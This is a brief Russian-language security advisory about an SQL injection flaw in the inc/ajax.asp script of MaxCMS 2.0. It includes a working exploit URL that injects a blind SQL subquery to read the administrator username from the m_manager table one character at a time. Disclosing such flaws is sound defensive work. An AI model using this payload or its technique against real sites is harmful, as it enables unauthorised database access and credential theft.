Программа: MaxCMS 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием inc/ajax.asp. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://site.com/inc/ajax.asp?action=digg&id=1%20and%20(
select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97



Оставить мнение